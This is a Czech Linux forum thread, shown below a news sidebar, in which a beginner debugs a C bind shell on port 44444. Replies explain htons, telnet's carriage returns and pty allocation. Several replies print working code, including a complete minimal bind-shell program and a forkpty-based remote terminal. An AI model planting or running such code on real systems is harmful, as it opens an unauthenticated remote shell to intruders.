abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
eParkomat, startup z ČR, postoupil mezi finalisty evropského akcelerátoru ChallengeUp!
Robot na pivo mu otevřel dveře k opravdovému byznysu
Internet věcí: Propojený svět? Už se to blíží...
včera 22:44 | Komunita

Joinup informuje, že Mnichov používá open source groupware Kolab. V srpnu byl dokončen dvouletý přechod na toto řešení. V provozu je asi 60 000 poštovních schránek. Nejenom Kolabu se věnoval Georg Greve ve své přednášce Open Source: the future for the European institutions (SlideShare) na konferenci DIGITEC 2016, jež proběhla v úterý 29. listopadu v Bruselu. Videozáznam přednášek z hlavního sálu je ke zhlédnutí na Livestreamu.

Ladislav Hagara | Komentářů: 5
včera 15:30 | Zajímavý projekt

Společnost Jolla oznámila v příspěvku Case study: Sailfish Watch na svém blogu, že naportovala Sailfish OS na chytré hodinky. Využila a inspirovala se otevřeným operačním systémem pro chytré hodinky AsteroidOS. Použita je knihovna libhybris. Ukázka ovládání hodinek na YouTube.

Ladislav Hagara | Komentářů: 6
včera 14:15 | Nová verze

Byla vydána verze 7.1.0 skriptovacího jazyka PHP používaného zejména k vývoji dynamických webových stránek. Jedná se o první stabilní verzi nejnovější větvě 7.1. Přehled novinek v dokumentaci. Podrobnosti v ChangeLogu. K dispozici je také příručka pro přechod z PHP 7.0.x na PHP 7.1.x.

Ladislav Hagara | Komentářů: 1
včera 12:55 | Nová verze

Google Chrome 55 byl prohlášen za stabilní. Nejnovější stabilní verze 55.0.2883.75 tohoto webového prohlížeče přináší řadu oprav a vylepšení (YouTube). Opraveno bylo také 36 bezpečnostních chyb. Mariusz Mlynski si například vydělal 22 500 dolarů za 3 nahlášené chyby (Universal XSS in Blink).

Ladislav Hagara | Komentářů: 4
včera 11:55 | Pozvánky

Máte rádi svobodný software a hardware nebo se o nich chcete něco dozvědět? Přijďte na 135. sraz spolku OpenAlt, který se bude konat ve čtvrtek 8. prosince od 18:00 v Radegastovně Perón (Stroupežnického 20, Praha 5). Sraz bude tentokrát tématický. Bude retro! K vidění budou přístroje jako Psion 5mx nebo Palm Z22. Ze svobodného hardwaru pak Openmoko nebo čtečka WikiReader. Přijďte se i vy pochlubit svými legendami, nebo alespoň na pivo. Moderní hardware má vstup samozřejmě také povolen.

xkucf03 | Komentářů: 0
včera 00:10 | Nová verze

Byla vydána verze 3.2 svobodného systému pro detekci a prevenci průniků a monitorování bezpečnosti počítačových sítí Suricata. Z novinek lze zmínit například podporu protokolů DNP3 a CIP/ENIP, vylepšenou podporu TLS a samozřejmě také aktualizovanou dokumentaci.

Ladislav Hagara | Komentářů: 0
1.12. 21:00 | Nová verze

Byla vydána beta verze Linux Mintu 18.1 s kódovým jménem Serena. Na blogu Linux Mintu jsou hned dvě oznámení. První o vydání Linux Mintu s prostředím MATE a druhé o vydání Linux Mintu s prostředím Cinnamon. Stejným způsobem jsou rozděleny také poznámky k vydání (MATE, Cinnamon) a přehled novinek s náhledy (MATE, Cinnamon). Linux Mint 18.1 bude podporován až do roku 2021.

Ladislav Hagara | Komentářů: 0
1.12. 16:42 | Nová verze

Byl vydán Devuan Jessie 1.0 Beta 2. Jedná se o druhou beta verzi forku Debianu bez systemd představeného v listopadu 2014 (zprávička). První beta verze byla vydána v dubnu letošního roku (zprávička). Jedna z posledních přednášek věnovaných Devuanu proběhla v listopadu na konferenci FSCONS 2016 (YouTube, pdf).

Ladislav Hagara | Komentářů: 0
1.12. 15:16 | Komunita

Na GOG.com začal zimní výprodej. Řada zlevněných her běží oficiálně také na Linuxu. Hru Neverwinter Nights Diamond lze dva dny získat zdarma. Hra dle stránek GOG.com na Linuxu neběží. Pomocí návodu ji lze ale rozběhnout také na Linuxu [Gaming On Linux].

Ladislav Hagara | Komentářů: 1
1.12. 13:14 | Bezpečnostní upozornění

Byla vydána verze 2.7.1 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Řešeno je několik bezpečnostních problémů. Aktualizován byl především Tor Browser na verzi 6.0.7. Tor Browser je postaven na Firefoxu ESR (Extended Support Release) a právě ve Firefoxu byla nalezena a opravena vážná bezpečnostní chyba MFSA 2016-92 (CVE-2016-9079, Firefox SVG Animation

… více »
Ladislav Hagara | Komentářů: 0
Kolik máte dat ve svém domovském adresáři na svém primárním osobním počítači?
 (32%)
 (24%)
 (29%)
 (7%)
 (5%)
 (3%)
Celkem 761 hlasů
 Komentářů: 50, poslední 29.11. 15:50
Rozcestník
Reklama

Dotaz: bindshell v C

7.2.2009 13:06 qadamc03
bindshell v C
Přečteno: 629×

Dobry den,

mam takovyto jednoduchy bindshell napsany v C:

www.qg.ic.cz/a/bindshell.c

Podle me by mel po spusteni fungovat tak, ze bude cekat na portu 44444 a po pripojeni (treba pres telnet) mi preda shell. Narazil jsem vsak na dva problemy:

Spustim program

$ ./bindshell

Pokusim se pripojit na port 44444:

$ telnet localhost 44444
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused

Program neposloucha na portu 44444, divne, podivam se tedy pres nmap, kde ve skutecnosti visi:

$ sudo nmap -sS -p1-65000 localhost

Starting Nmap 4.76 ( http://nmap.org ) at 2009-02-07 13:03 CET
Interesting ports on localhost.localdomain (127.0.0.1):
Not shown: 64997 closed ports
PORT      STATE SERVICE
40109/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 4.83 seconds

Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:

$ telnet localhost 40109
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
ls
: command not found
id
: command not found

Nemam shell, pouze "visim" v konzoli. Proc? V sitovem programovani jsem zacatecnik, muze mi prosim nekdo tyto dva jevy objasnit? Budu moc vdecny.

Odpovědi

7.2.2009 14:09 Vojtěch Horký | skóre: 39 | blog: Vojtův zápisník | Praha
Rozbalit Rozbalit vše Re: bindshell v C
Program je na portu 40109, proc? Zkusim se k nemu tedy pripojit:

man htons

Nemam shell, pouze "visim" v konzoli. Proc?

Tipuju, že shell nedostal proměnné prostředí (posl. parametr execve) - především $PATH a tudíž netuší, kde má hledat binárky.

BTW - argv[0] není cesta, ale pouze basename (tj. spouštět stylem execve("/bin/sh", {"sh", NULL}, environ)).

I am always ready to learn although I do not always like to be taught. (W. Churchill)
7.2.2009 15:43 qadamc03
Rozbalit Rozbalit vše Re: bindshell v C

Na htons jsem uplne zapomnel, dekuji. Porty se uz prirazuji korektne. Program jsem tedy upravil takto:

www.qg.ic.cz/a/bindshell.c

Ale problem s "command not found" stale pretrvava:/
 

7.2.2009 16:08 Vojtěch Horký | skóre: 39 | blog: Vojtův zápisník | Praha
Rozbalit Rozbalit vše Re: bindshell v C
Ale problem s "command not found" stale pretrvava:/

Pokud se přidá parametr -i pro interaktivní shell, tak mi to běhá (ale dost dobře nechápu proč to bez toho nefunguje a proč si myslí, že argv[0] je '').

I am always ready to learn although I do not always like to be taught. (W. Churchill)
7.2.2009 18:20 pht | skóre: 48 | blog: pht
Rozbalit Rozbalit vše Re: bindshell v C
Tak sem hoďte zdroják. Jinak tohle je dost obvyklý problém -- má to nějaký jednoduchý důvod, ale teď si nemůžu vzpomenout proč to tak dělá. Lze to dohledat. (Tuším že se to dalo obejít středníkem, zkuste zadat "ls;".) I když to vyřešíte, tak dostanete jen dost primitivní shell. Zkuste to přes alokaci pty, tam dostanete něco použitelného.
In Ada the typical infinite loop would normally be terminated by detonation.
8.2.2009 08:22 luky
Rozbalit Rozbalit vše Re: bindshell v C
1. cislo portu prohnat funkci htons().
2. pokud shell neni interaktivni, tak nevypisuje prompt. mozno vynutit parametrem -i.
3. telnet do radku pridava \r. muzete prikazy zadavat se strednikem (takze to smeti bude az za nim), nebo se pripojovat treba netcatem, nebo to programove osetrit.
8.2.2009 08:56 luky
Rozbalit Rozbalit vše Re: bindshell v C
A to \r taky zpusobuje iluzi prazdneho jmena tim, ze presouva kurzor na zacatek radku a dalsi vypisovany text prepisuje ten puvodni. Pri pouziti delsiho jmena to je hezky videt.

Kdyz do argv[0] dam "ABCDEFGHIJKLMNOPQRSTUVWXYZ" a zadam prikaz "id", ktery telnet posle jako "id\r", tak shell v mem pripade vypisuje chybu:

ABCDEFGHIJKLMNOPQRSTUVWXYZ: line 1: id\r: command not found\n

kterou vidim jako:

: command not foundTUVWXYZ: line 1: id
8.2.2009 12:39 qadamc03
Rozbalit Rozbalit vše Re: bindshell v C

Dekuji, pomohlo to, program jsem tedy upravil, ted uz ma jen jednu mouchu:

$ nc localhost 44444
sh: no job control in this shell
sh-3.2$

Jak se prosim zbavim te hlasky "no job control in this shell"

8.2.2009 13:05 qadamc03
Rozbalit Rozbalit vše Re: bindshell v C

Tak jsem si vsiml, ze tu hlasku to vypisuje pouze pokud bash volam takto:

execle("/bin/bash", "/bin/bash", "-i", NULL, envp);

Pokud ho zavolam takto (bez parametru -i):

execle("/bin/bash", "/bin/bash", NULL, envp);

je to OK. Ja bych tam ten prompt ale potreboval, nenapada vas jak toho dosahnout?

8.2.2009 19:21 pht | skóre: 48 | blog: pht
Rozbalit Rozbalit vše Re: bindshell v C
Tak znova.

Pokud to spustíte bez -i, tak se k Vám bash chová jako byste byl skript, tj. nenabízí vám prompt (mimo jiné).

Pokud ho spustíte s -i, řeknete mu že chcete "interaktivní režim". Tj. prompt se zobrazí. Proč Vám tedy nenabídne job control? Protože nemáte alokovaný terminál, místo toho je bash pouze napojen na síťový socket. Jelikož je v interaktivním režimu běžné mít job control, tak Vás na tuto anomálii upozorní. Další věci které nefungují bez pořádného terminálu jsou například ctrl-c, ctrl-z.

In Ada the typical infinite loop would normally be terminated by detonation.
10.2.2009 14:43 qadamc03
Rozbalit Rozbalit vše Re: bindshell v C

A je nejaka moznost jak mu ten terminal alokovat i kdyz pouzivam interaktivni rezim? Jednoduse zabranit vypisu te hlasky - nevypada to tam pekne.

10.2.2009 15:19 Messa | skóre: 39 | blog: Messa
Rozbalit Rozbalit vše Re: bindshell v C

man 7 pty

man posix_openpt

10.2.2009 16:56 qadamc03
Rozbalit Rozbalit vše Re: bindshell v C

A jakym zpusobem to zapomponovat do toho programu? Ta funkce vraci file describtor a ten pak presmeruju do toho socketu stejne jako to delam se stdin, stdout a stderr?

10.2.2009 17:22 Messa | skóre: 39 | blog: Messa
Rozbalit Rozbalit vše Re: bindshell v C

Ano, a bash připojíte na slave.

10.2.2009 22:29 qadamc03
Rozbalit Rozbalit vše Re: bindshell v C

Jaky slave?

 

10.2.2009 23:34 luky
Rozbalit Rozbalit vše Re: bindshell v C
Pro ten terminál budete mít dva deskriptory - master a slave. Všechno je to popsáno v těch odkazovaných manuálových stránkách.
11.2.2009 11:05 qadamc03
Rozbalit Rozbalit vše Re: bindshell v C

Omlouvam se, asi jsem slepy, ale tady:

man posix_openpt

v sekci return value, je ze ta funkce vraci "a non-negative file descriptor which is the lowest numbered unused descriptor", coz je jeden fd. Kde tedy sezenu ten druhy?

11.2.2009 12:49 Sinuhet | skóre: 31
Rozbalit Rozbalit vše Re: bindshell v C
$ man pts
   ...

   Unix 98 pseudo-terminals
       An unused Unix 98 pseudo-terminal master is opened by calling posix_openpt(3).  (This function opens the  mas‐
       ter clone device, /dev/ptmx; see pts(4).)  After performing any program-specific initializations, changing the
       ownership and permissions of the slave device using grantpt(3), and unlocking the  slave  using  unlockpt(3)),
       the  corresponding slave device can be opened by passing the name returned by ptsname(3) in a call to open(2).

   ...
11.2.2009 14:52 qadamc03
Rozbalit Rozbalit vše Re: bindshell v C

Tak ja uz se v tom teda nejak nevyznam:-/ Muze mi prosim nejaka dobra duse poradit tak vse vyse zminene naroubuji do tohoto kodu?

...
// redirect
dup2(sock2, 0);
dup2(sock2, 1);
// execute
execle("/bin/bash", "/bash", "-i", NULL, envp);
12.2.2009 13:29 luky
Rozbalit Rozbalit vše Re: bindshell v C

Zhruba jde o to, že až otevřete ten terminál, tak vytvoříte nový proces, ve kterém na slave toho terminálu píchnete ten shell a v původním procesu budete přesypávat data z masteru do socketu a zpátky. Není to nic složitého, ale psát to za vás nikdo nebude. Na internetu se válí spousta dokumentace a kódu pro inspiraci.

man fork, wait, select, write/read(/send/recv), ...

Pak se taky možná dostanete k signálům pro kontrolu terminálu/procesu a jejich předávání z klienta a buď se na to vykašlete, nebo budete o kus chytřejší :)

11.2.2009 14:04 pht | skóre: 48 | blog: pht
Rozbalit Rozbalit vše Re: bindshell v C
Já jsem to měl takhle nějak, za použití neposixího forkpty, tak se můžete inspirovat. Případne můžou pánové šťouralové vylepšit.
static void run_terminal(int socket)
{
        pid_t p, pp;
        int m;
        struct winsize ws = { .ws_row = 25, .ws_col = 80,
                .ws_xpixel = 0,  .ws_ypixel = 0 };

        p = forkpty(&m, NULL, NULL, &ws);
        if (p < 0) {
                error("forkpty");
                close(socket);
                close(m);
                return;
        }

        if (p > 0) {
                pp = fork();
                if (pp < 0) {
                        error("fork");
                        close(socket);
                        close(m);
                        return;
                }
                if (pp > 0) {
                        close(socket);
                        close(m);
                        return;
                }
                close(listen_socket);
                say("entering copy loop");
                copy_loop(m, m, socket, socket);
                say("copy loop finished");
                kill(p, 1);
                exit(0);
        } else {
                close(listen_socket);
                close(socket);
                close(m);
                say("spawning shell");
                execl("/bin/bash", "bash", "-i", "-l", NULL);
                bail("execl");
        }
}

In Ada the typical infinite loop would normally be terminated by detonation.
11.2.2009 15:29 Messa | skóre: 39 | blog: Messa
Rozbalit Rozbalit vše Re: bindshell v C

Skoro mě napadá otázka, na jaké škole se dávají takovéhle úkoly? :-)

11.2.2009 19:07 pht | skóre: 48 | blog: pht
Rozbalit Rozbalit vše Re: bindshell v C
Bojím se, že u nás asi na nijaké, přitom to je celkem standardní příklad na programování v unixu a na bezpečnost jakbysmet.
In Ada the typical infinite loop would normally be terminated by detonation.
8.2.2009 19:22 pht | skóre: 48 | blog: pht
Rozbalit Rozbalit vše Re: bindshell v C
3. telnet do radku pridava \r.
Jo, to je ten jednoduchý důvod :-)
In Ada the typical infinite loop would normally be terminated by detonation.
murzim avatar 8.2.2009 19:32 murzim | skóre: 12 | blog: murzim
Rozbalit Rozbalit vše Re: bindshell v C

Ahoj ja pouzivam tento kod - je kratsi a ve vysledku i uspornejsi jako shellkod:

#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc,cli;
struct sockaddr_in serv_addr;

int main(){
    serv_addr.sin_family=2;
    serv_addr.sin_addr.s_addr=0;
    serv_addr.sin_port=0x9CAD;   // Toto je to tvoje cislo portu 44444 zapsane v hex a prevracene - cili klasicky --> 0xAD9C ---> AD|9C --> 0x9CAD
    soc=socket(2,1,0);
    bind(soc,(struct sockaddr *)&serv_addr,0x10);
    listen(soc,1);
    cli=accept(soc,0,0);
    dup2(cli,0);
    dup2(cli,1);
    dup2(cli,2);
    execve("/bin/sh",0,0);
}

jinak doporucuji namisto telnet pouzit nc cili:

nc localhost 44444

 

Bůh stvořil člověka a opice vznikly evolucí "o pár let později" z blbých lidí.
8.2.2009 20:09 Vojtěch Horký | skóre: 39 | blog: Vojtův zápisník | Praha
Rozbalit Rozbalit vše Re: bindshell v C
Nedá mi to, abych nezareagoval: používat magická čísla (soc=socket(2,1,0); atd.) je cesta do pekel. Ten původní kód je přehlednější a nepřijde mi o tolik delší.
I am always ready to learn although I do not always like to be taught. (W. Churchill)

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.